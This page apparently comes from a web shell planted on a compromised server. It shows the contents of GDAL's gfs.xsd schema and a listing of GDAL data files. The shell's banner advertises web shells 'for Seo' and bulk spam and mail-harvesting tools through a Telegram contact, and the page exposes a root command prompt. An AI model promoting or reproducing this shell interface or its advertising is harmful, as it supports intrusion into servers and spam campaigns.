__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.216.74: ~ $
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">

  <xs:element name="GMLFeatureClassList">
    <xs:complexType>
      <xs:sequence>
        <xs:element minOccurs="0" name="SequentialLayers" type="xs:boolean" default="false">
          <xs:annotation>
            <xs:documentation>Set this element to true if all features belonging to the same layer are written sequentially in the file. The reader will then avoid unnecessary resets when layers are read completely one after the other. To get the best performance, the layers must be read in the order they appear in the file. Cf https://gdal.org/drivers/vector/gml.html#performance-issues-with-large-multi-layer-gml-files</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element maxOccurs="unbounded" minOccurs="0" name="GMLFeatureClass">
          <xs:complexType>
            <xs:sequence>
              <xs:element name="Name" type="xs:string">
                <xs:annotation>
                  <xs:documentation>Name of the feature type; essentially used as layer name. Can be different than the name of the XML element that represents such a feature in XML data. Examples: case can change, a prefix can be added to the name, and the name can be more human readable (e.g. the full name, rather than an abbreviation).
                  Different GMLFeatureClass elements should have a different name.
                  </xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element name="ElementPath" type="xs:string">
                <xs:annotation>
                  <xs:documentation>Defines the path in a given XML document to the elements that represent the GML feature. Can use '|' as element separator. Namespace prefixes of path elements are insignificant.
                  As multiple ElementPath-elements are not allowed per GMLFeatureClass, if a feature type was encoded in different places in an XML document (e.g. on collection member level, as well as inline in some other feature), the gfs file would have to contain multiple GMLFeatureClass entries, with different ElementPaths.</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element maxOccurs="unbounded" minOccurs="0" ref="GeomPropertyDefn">
                <xs:annotation>
                  <xs:documentation>Defines a geometry column. This element may be repeated if there are several geometry columns. For backward compatibility with older GDAL versions, the GDAL .gfs writer will only write this element if there are several geometry columns, but it is allowed to use it if there is just a single geometry column. GeomPropertyDefn is mutually exclusive with GeometryName, GeometryElementPath and GeometryType</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element minOccurs="0" name="GeometryName" type="xs:string">
                <xs:annotation>
                  <xs:documentation>Name of a geometric property of the feature. Can be different than the name of the XML element that represents that property. Examples: case can change, a prefix can be added to the name, and the name can be more human readable (e.g. the full name, rather than an abbreviation, or a combination of names in the element path). Mutually exclusive with GeomPropertyDefn</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element minOccurs="0" name="GeometryElementPath" type="xs:string">
                <xs:annotation>
                  <xs:documentation>Defines the path to the XML element that represents the geometry property within the XML element of the GML feature. Can use '|' as element separator. Namespace prefixes of path elements are insignificant. NOTE: The path should not include the actual GML geometry element itself. Used in combination with the GeometryName. Mutually exclusive with GeomPropertyDef.</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element minOccurs="0" name="GeometryType" type="SupportedGeometryTypes">
                <xs:annotation>
                  <xs:documentation>Used in combination with the GeometryName. Mutually exclusive with GeomPropertyDef.</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element minOccurs="0" name="SRSName" type="xs:string">
                <xs:annotation>
                  <xs:documentation>Defines the SRS of all geometry columns of the layer. Typically a string of the form urn:ogc:def:crs:EPSG::XXXX</xs:documentation>
                </xs:annotation>
              </xs:element>
              <xs:element minOccurs="0" name="DatasetSpecificInfo">
                <xs:annotation>
                  <xs:documentation>Contains optional information about the feature count of the layer and its extent. This should not be used in .gfs templates, but for specific instantiation of a .gfs on a given .gml file</xs:documentation>
                </xs:annotation>
                <xs:complexType>
                  <xs:all>
                    <xs:element minOccurs="0" name="FeatureCount" type="xs:nonNegativeInteger">
                      <xs:annotation>
                        <xs:documentation>Number of features in the layer</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    <xs:element minOccurs="0" name="ExtentXMin" type="xs:double">
                      <xs:annotation>
                        <xs:documentation>Minimum X value of the layer extent.</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    <xs:element default="0.0" minOccurs="0" name="ExtentXMax" type="xs:double">
                      <xs:annotation>
                        <xs:documentation>Maximum X value of the layer extent.</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    <xs:element default="0.0" minOccurs="0" name="ExtentYMin" type="xs:double">
                      <xs:annotation>
                        <xs:documentation>Minimum Y value of the layer extent.</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    <xs:element default="0.0" minOccurs="0" name="ExtentYMax" type="xs:double">
                      <xs:annotation>
                        <xs:documentation>Maximum X value of the layer extent.</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    <!-- To remove ultimately when support for that in the code is removed
                    <xs:element minOccurs="0" name="ExtraInfo" type="xs:string">
                      <xs:annotation>
                        <xs:documentation>Unused</xs:documentation>
                      </xs:annotation>
                    </xs:element>
                    -->
                  </xs:all>
                </xs:complexType>
              </xs:element>
              <xs:element maxOccurs="unbounded" minOccurs="0" ref="PropertyDefn"/>
            </xs:sequence>
          </xs:complexType>
        </xs:element>
      </xs:sequence>
    </xs:complexType>
    <xs:unique name="uniqueGMLFeatureClassNames">
      <xs:annotation>
        <xs:documentation>The names of all GMLFeatureClasses within the GMLFeatureClassList must be unique.</xs:documentation>
      </xs:annotation>
      <xs:selector xpath="GMLFeatureClass"/>
      <xs:field xpath="Name"/>
    </xs:unique>
  </xs:element>
  <xs:simpleType name="SupportedGeometryTypes">
    <xs:annotation>
      <xs:documentation>Geometry type, expressed either as a numeric value matching the OGRwkbGeometryType enumeration or a string ([Multi]?Point|[Multi]?LineString|[Multi]?Polygon|GeometryCollection|CircularString|CurvePolygon|[Multi]Curve|[Multi]Surface|Triangle|PolyhedralSurface|TIN)Z?M? or None to indicate a layer without geometry field.</xs:documentation>
    </xs:annotation>
    <xs:restriction base="xs:string">
      <xs:pattern value="-?[0-9]+"/>
      <!-- value from OGRwkbGeometryType enumeration -->
      <xs:pattern value="[pP][oO][iI][nN][tT]Z?M?"/>
      <xs:pattern value="[lL][iI][nN][eE][sS][tT][rR][iI][nN][gG]Z?M?"/>
      <xs:pattern value="[pP][oO][lL][yY][gG][oO][nN]Z?M?"/>
      <xs:pattern value="[mM][uU][lL][tT][iI][pP][oO][iI][nN][tT]Z?M?"/>
      <xs:pattern value="[mM][uU][lL][tT][iI][lL][iI][nN][eE][sS][tT][rR][iI][nN][gG]Z?M?"/>
      <xs:pattern value="[mM][uU][lL][tT][iI][pP][oO][lL][yY][gG][oO][nN]Z?M?"/>
      <xs:pattern value="[gG][eE][oO][mM][eE][tT][rR][yY][cC][oO][lL][lL][eE][cC][tT][iI][oO][nN]Z?M?"/>
      <xs:pattern value="[cC][iI][rR][cC][uU][lL][aA][rR][sS][tT][rR][iI][nN][gG]Z?M?"/>
      <xs:pattern value="[cC][oO][mM][pP][oO][uU][nN][dD][cC][uU][rR][vV][eE]Z?M?"/>
      <xs:pattern value="[cC][uU][rR][vV][eE][pP][oO][lL][yY][gG][oO][nN]Z?M?"/>
      <xs:pattern value="[mM][uU][lL][tT][iI][cC][uU][rR][vV][eE]Z?M?"/>
      <xs:pattern value="[mM][uU][lL][tT][iI][sS][uU][rR][fF][aA][cC][eE]Z?M?"/>
      <xs:pattern value="[cC][uU][rR][vV][eE]Z?M?"/>
      <xs:pattern value="[sS][uU][rR][fF][aA][cC][eE]Z?M?"/>
      <xs:pattern value="[tT][rR][iI][aA][nN][gG][lL][eE]Z?M?"/>
      <xs:pattern value="[pP][oO][lL][yY][hH][eE][dD][rR][aA][lL][sS][uU][rR][fF][aA][cC][eE]Z?M?"/>
      <xs:pattern value="[tT][iI][nN]Z?M?"/>
      <xs:pattern value="[nN][oO][nN][eE]"/>
    </xs:restriction>
  </xs:simpleType>
  <xs:element name="GeomPropertyDefn">
    <xs:complexType>
      <xs:all>
        <xs:element name="Name" type="xs:string">
          <xs:annotation>
            <xs:documentation>Name of a geometric property of the feature. Can be different than the name of the XML element that represents that property. Examples: case can change, a prefix can be added to the name, and the name can be more human readable (e.g. the full name, rather than an abbreviation, or a combination of names in the element path).</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element name="ElementPath" type="xs:string">
          <xs:annotation>
            <xs:documentation>Defines the path to the XML element that represents the geometry property within the XML element of the GML feature. Can use '|' as element separator. Namespace prefixes of path elements are insignificant. NOTE: The path should not include the actual GML geometry element itself.</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element name="Type" type="SupportedGeometryTypes">
          <xs:annotation>
            <xs:documentation/>
          </xs:annotation>
        </xs:element>
        <xs:element default="true" minOccurs="0" name="Nullable" type="xs:boolean">
          <xs:annotation>
            <xs:documentation>Can be set to false to indicate that null/missing geometries are forbidden.</xs:documentation>
          </xs:annotation>
        </xs:element>
      </xs:all>
    </xs:complexType>
  </xs:element>
  <xs:element name="PropertyDefn">
    <xs:complexType>
      <xs:all>
        <xs:element name="Name" type="xs:string">
          <xs:annotation>
            <xs:documentation>Name of a non-geometric property of the feature. Can be different than the name of the XML element that represents that property.

NOTE: Properties with name suffix "_href" - typically used when the ElementPath ends in @xlink:href - can be used to build junction tables. For further details, see https://gdal.org/drivers/vector/gml.html#building-junction-tables.

Examples: case can change, a prefix can be added to the name, and the name can be more human readable (e.g. the full name, rather than an abbreviation, or a combination of names in the element path).</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element name="ElementPath" type="xs:string">
          <xs:annotation>
            <xs:documentation>Defines the path to the XML element that represents the property within the XML element of the GML feature. Can use '|' as element separator. The last path segment may have an XML attribute name as suffix, using '@' as separator (e.g., width@uom). Namespace prefixes of path elements are insignificant.</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element name="Type">
          <xs:annotation>
            <xs:documentation>Field type. Complex may be used to indicate that the value of the element is not a simple type.</xs:documentation>
          </xs:annotation>
          <xs:simpleType>
            <xs:restriction base="xs:string">
              <!-- Untyped is referenced in the code but not used in practice; Complex does not appear to have any effect (furthermore, its use is unclear) -->
              <xs:enumeration value="String"/>
              <xs:enumeration value="Integer"/>
              <xs:enumeration value="Real"/>
              <xs:enumeration value="StringList"/>
              <xs:enumeration value="IntegerList"/>
              <xs:enumeration value="RealList"/>
              <xs:enumeration value="Complex"/>
              <xs:enumeration value="FeatureProperty"/>
              <xs:enumeration value="FeaturePropertyList"/>
            </xs:restriction>
          </xs:simpleType>
        </xs:element>
        <xs:element default="true" minOccurs="0" name="Nullable" type="xs:boolean">
          <xs:annotation>
            <xs:documentation>Can be set to false to indicate that null/missing values are forbidden.</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element minOccurs="0" name="Subtype">
          <xs:annotation>
            <xs:documentation>Further specializes the property type. Allowed combinations are: (Type: Integer, Subtype: Short, Integer64), (Type: IntegerList, Subtype: Integer64), (Type: Real, Subtype: Float), (Type: String, Subtype: Boolean, Date, Time, Datetime), (Type: StringList, Subtype: Boolean)</xs:documentation>
          </xs:annotation>
          <xs:simpleType>
            <xs:restriction base="xs:string">
              <xs:enumeration value="Boolean"/>
              <xs:enumeration value="Date"/>
              <xs:enumeration value="Time"/>
              <xs:enumeration value="Datetime"/>
              <xs:enumeration value="Short"/>
              <xs:enumeration value="Integer64"/>
              <xs:enumeration value="Float"/>
            </xs:restriction>
          </xs:simpleType>
        </xs:element>
        <xs:element minOccurs="0" name="Condition" type="xs:string">
          <xs:annotation>
            <xs:documentation>Can be used to create multiple properties from the same XML element, based upon a set of mutually exclusive conditions. For further details, and examples, see https://gdal.org/drivers/vector/gml.html#using-conditions-on-xml-attributes</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element default="false" minOccurs="0" name="Unique" type="xs:boolean">
          <xs:annotation>
            <xs:documentation>When set to true, indicates that values of that field are unique through all the features of the layer</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element default="0" minOccurs="0" name="Width" type="xs:nonNegativeInteger">
          <xs:annotation>
            <xs:documentation>Maximum width of the string representation of the values of the field. Supported use cases: (Type: String, Subtype is NOT Boolean, Date, Time, or Datetime), (Type: Integer), (Type: Real)</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element default="0" minOccurs="0" name="Precision" type="xs:nonNegativeInteger">
          <xs:annotation>
            <xs:documentation>Only applies to Real. Maximum decimal precision (i.e. number of digits after the decimal point) of the values of the field.</xs:documentation>
          </xs:annotation>
        </xs:element>
        <xs:element default="false" minOccurs="0" name="Comment" type="xs:string">
          <xs:annotation>
            <xs:documentation>Description of the field (added in GDAL 3.7)</xs:documentation>
          </xs:annotation>
        </xs:element>
      </xs:all>
    </xs:complexType>
  </xs:element>
</xs:schema>

Filemanager

Name Type Size Permission Actions
GDALLogoBW.svg File 12.72 KB 0644
GDALLogoColor.svg File 12.02 KB 0644
GDALLogoGS.svg File 12.02 KB 0644
bag_template.xml File 8.81 KB 0644
default.rsc File 452.77 KB 0644
eedaconf.json File 411 B 0644
epsg.wkt File 27 B 0644
esri_StatePlane_extra.wkt File 324.75 KB 0644
gdalicon.png File 1.63 KB 0644
gdalinfo_output.schema.json File 7.8 KB 0644
gdalmdiminfo_output.schema.json File 6.39 KB 0644
gdalvrt.xsd File 33.13 KB 0644
gfs.xsd File 16.08 KB 0644
gml_registry.xml File 6.49 KB 0644
gml_registry.xsd File 6.31 KB 0644
gmlasconf.xml File 7.26 KB 0644
gmlasconf.xsd File 47.51 KB 0644
grib2_center.csv File 4.07 KB 0644
grib2_process.csv File 4.81 KB 0644
grib2_subcenter.csv File 2.27 KB 0644
grib2_table_4_2_0_0.csv File 10.12 KB 0644
grib2_table_4_2_0_1.csv File 16.12 KB 0644
grib2_table_4_2_0_13.csv File 9.37 KB 0644
grib2_table_4_2_0_14.csv File 9.33 KB 0644
grib2_table_4_2_0_15.csv File 9.62 KB 0644
grib2_table_4_2_0_16.csv File 9.44 KB 0644
grib2_table_4_2_0_17.csv File 923 B 0644
grib2_table_4_2_0_18.csv File 9.98 KB 0644
grib2_table_4_2_0_19.csv File 11.6 KB 0644
grib2_table_4_2_0_190.csv File 9.28 KB 0644
grib2_table_4_2_0_191.csv File 9.39 KB 0644
grib2_table_4_2_0_2.csv File 10.64 KB 0644
grib2_table_4_2_0_20.csv File 12 KB 0644
grib2_table_4_2_0_21.csv File 10.02 KB 0644
grib2_table_4_2_0_3.csv File 10.31 KB 0644
grib2_table_4_2_0_4.csv File 10.07 KB 0644
grib2_table_4_2_0_5.csv File 9.6 KB 0644
grib2_table_4_2_0_6.csv File 11.37 KB 0644
grib2_table_4_2_0_7.csv File 10.25 KB 0644
grib2_table_4_2_10_0.csv File 11.54 KB 0644
grib2_table_4_2_10_1.csv File 9.4 KB 0644
grib2_table_4_2_10_191.csv File 9.41 KB 0644
grib2_table_4_2_10_2.csv File 9.88 KB 0644
grib2_table_4_2_10_3.csv File 9.75 KB 0644
grib2_table_4_2_10_4.csv File 10.56 KB 0644
grib2_table_4_2_1_0.csv File 9.9 KB 0644
grib2_table_4_2_1_1.csv File 9.43 KB 0644
grib2_table_4_2_1_2.csv File 9.57 KB 0644
grib2_table_4_2_20_0.csv File 9.42 KB 0644
grib2_table_4_2_20_1.csv File 9.62 KB 0644
grib2_table_4_2_20_2.csv File 9.28 KB 0644
grib2_table_4_2_2_0.csv File 12.37 KB 0644
grib2_table_4_2_2_3.csv File 10.38 KB 0644
grib2_table_4_2_2_4.csv File 10.96 KB 0644
grib2_table_4_2_2_5.csv File 9.29 KB 0644
grib2_table_4_2_2_6.csv File 9.37 KB 0644
grib2_table_4_2_3_0.csv File 10.69 KB 0644
grib2_table_4_2_3_1.csv File 10.41 KB 0644
grib2_table_4_2_3_2.csv File 3.74 KB 0644
grib2_table_4_2_3_3.csv File 784 B 0644
grib2_table_4_2_3_4.csv File 1.03 KB 0644
grib2_table_4_2_3_5.csv File 920 B 0644
grib2_table_4_2_3_6.csv File 819 B 0644
grib2_table_4_2_4_0.csv File 9.33 KB 0644
grib2_table_4_2_4_1.csv File 9.46 KB 0644
grib2_table_4_2_4_10.csv File 9.47 KB 0644
grib2_table_4_2_4_2.csv File 9.43 KB 0644
grib2_table_4_2_4_3.csv File 9.49 KB 0644
grib2_table_4_2_4_4.csv File 9.46 KB 0644
grib2_table_4_2_4_5.csv File 9.27 KB 0644
grib2_table_4_2_4_6.csv File 9.41 KB 0644
grib2_table_4_2_4_7.csv File 9.33 KB 0644
grib2_table_4_2_4_8.csv File 9.46 KB 0644
grib2_table_4_2_4_9.csv File 9.31 KB 0644
grib2_table_4_2_local_Canada.csv File 333 B 0644
grib2_table_4_2_local_HPC.csv File 87 B 0644
grib2_table_4_2_local_MRMS.csv File 15.22 KB 0644
grib2_table_4_2_local_NCEP.csv File 27.32 KB 0644
grib2_table_4_2_local_NDFD.csv File 2.6 KB 0644
grib2_table_4_2_local_index.csv File 251 B 0644
grib2_table_4_5.csv File 9.78 KB 0644
grib2_table_versions.csv File 38 B 0644
gt_datum.csv File 15.43 KB 0644
gt_ellips.csv File 1.68 KB 0644
header.dxf File 6.42 KB 0644
inspire_cp_BasicPropertyUnit.gfs File 1.7 KB 0644
inspire_cp_CadastralBoundary.gfs File 1.61 KB 0644
inspire_cp_CadastralParcel.gfs File 2.39 KB 0644
inspire_cp_CadastralZoning.gfs File 4.7 KB 0644
jpfgdgml_AdmArea.gfs File 1.6 KB 0644
jpfgdgml_AdmBdry.gfs File 1.35 KB 0644
jpfgdgml_AdmPt.gfs File 1.59 KB 0644
jpfgdgml_BldA.gfs File 1.47 KB 0644
jpfgdgml_BldL.gfs File 1.47 KB 0644
jpfgdgml_Cntr.gfs File 1.47 KB 0644
jpfgdgml_CommBdry.gfs File 1.35 KB 0644
jpfgdgml_CommPt.gfs File 1.6 KB 0644
jpfgdgml_Cstline.gfs File 1.47 KB 0644
jpfgdgml_ElevPt.gfs File 1.46 KB 0644
jpfgdgml_GCP.gfs File 2.46 KB 0644
jpfgdgml_LeveeEdge.gfs File 1.35 KB 0644
jpfgdgml_RailCL.gfs File 1.47 KB 0644
jpfgdgml_RdASL.gfs File 1.22 KB 0644
jpfgdgml_RdArea.gfs File 1.48 KB 0644
jpfgdgml_RdCompt.gfs File 1.61 KB 0644
jpfgdgml_RdEdg.gfs File 1.6 KB 0644
jpfgdgml_RdMgtBdry.gfs File 1.35 KB 0644
jpfgdgml_RdSgmtA.gfs File 1.61 KB 0644
jpfgdgml_RvrMgtBdry.gfs File 1.36 KB 0644
jpfgdgml_SBAPt.gfs File 1.34 KB 0644
jpfgdgml_SBArea.gfs File 1.47 KB 0644
jpfgdgml_SBBdry.gfs File 1.22 KB 0644
jpfgdgml_WA.gfs File 1.46 KB 0644
jpfgdgml_WL.gfs File 1.46 KB 0644
jpfgdgml_WStrA.gfs File 1.47 KB 0644
jpfgdgml_WStrL.gfs File 1.47 KB 0644
netcdf_config.xsd File 7.32 KB 0644
nitf_spec.xml File 183.05 KB 0644
nitf_spec.xsd File 8.31 KB 0644
ogrinfo_output.schema.json File 10.87 KB 0644
ogrvrt.xsd File 25.31 KB 0644
osmconf.ini File 5.27 KB 0644
ozi_datum.csv File 8.28 KB 0644
ozi_ellips.csv File 1.32 KB 0644
pci_datum.txt File 34.27 KB 0644
pci_ellips.txt File 3.43 KB 0644
pdfcomposition.xsd File 33.53 KB 0644
pds4_template.xml File 3.35 KB 0644
plscenesconf.json File 40.4 KB 0644
ruian_vf_ob_v1.gfs File 45.64 KB 0644
ruian_vf_st_uvoh_v1.gfs File 2.54 KB 0644
ruian_vf_st_v1.gfs File 44.82 KB 0644
ruian_vf_v1.gfs File 65.68 KB 0644
s57agencies.csv File 12.99 KB 0644
s57attributes.csv File 19.53 KB 0644
s57expectedinput.csv File 20.4 KB 0644
s57objectclasses.csv File 52.17 KB 0644
seed_2d.dgn File 9 KB 0644
seed_3d.dgn File 2 KB 0644
stateplane.csv File 10.12 KB 0644
template_tiles.mapml File 1.9 KB 0644
tms_LINZAntarticaMapTileGrid.json File 4.02 KB 0644
tms_MapML_APSTILE.json File 6.13 KB 0644
tms_MapML_CBMTILE.json File 7.61 KB 0644
tms_NZTM2000.json File 5.14 KB 0644
trailer.dxf File 2.22 KB 0644
vdv452.xml File 25.21 KB 0644
vdv452.xsd File 2.79 KB 0644
vicar.json File 3.53 KB 0644
Filemanager